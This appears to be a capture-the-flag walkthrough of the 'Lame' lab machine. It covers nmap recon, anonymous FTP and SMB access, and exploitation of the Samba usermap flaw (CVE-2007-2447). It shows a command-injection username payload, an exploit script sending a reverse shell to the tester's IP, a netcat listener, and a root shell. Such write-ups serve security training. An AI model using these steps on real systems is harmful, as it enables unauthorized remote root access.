Recon
Port and service detection with nmap :
nmap -A 10.10.10.3 -Pn
We retieve these informations :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
|
Let’s try to connect as anonymous on port 21 (FTP):
1
2
3
4
5
6
7
8
9
|
ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:steels): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
|
We get errors when trying to use basic commands such as ls, we add -p to use the ftp passive mode.
There isn’t any directory or file on the ftp server but we can see that the vsFTPd version used is vulnerable to RCE using a backdoor on port 6200.
This exploit can be used against the server :
https://www.exploit-db.com/exploits/49757
The exploit doesn’t work on the machine, since nothing is running on port 6200.
Let’s explore the port 445, SMB server.
We try to connect with smbclient bu we get an error :
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
We just have to change the client minimal protocol in /etc/samba/smb.conf with NT1.
We try again with smbclient :
1
2
3
4
5
6
7
8
9
|
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
|
Nothing really interesting, we can check for known vulnerabilities on samba 3.X.
Exploitation
In theory, our SMB server is vulnerable to CVE-2007-2447. We can execute arbitrary code by injecting commands in the username when connecting :
-U "/=`nohup mkdir /tmp/foo`"
We’re going to use this script to gain a revshell :
https://raw.githubusercontent.com/amriunix/CVE-2007-2447/master/usermap_script.py
1
2
3
4
|
$ python3 usermap_script.py 10.10.10.3 445 10.10.16.6 4321
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !
|
Netcat side :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
$ nc -nvlp 4321
Listening on 0.0.0.0 4321
Connection received on 10.10.10.3 59071
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
initrd.img.old
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
|
Post-exploitation
We can upgrade our shell thanks to python and it’s import module :
python -c 'import pty; pty.spawn("/bin/bash")'
1
2
|
root@lame:/$ id
uid=0(root) gid=0(root) groups=0(root)
|
We can now retieve the user flag and the root one.
Easy, Internal, Network, SAMBA, Penetration Tester Level 1, Remote Code Execution, CVE-2007-2447, Public Vulnerabilities, CVE Exploitation, Security Tools
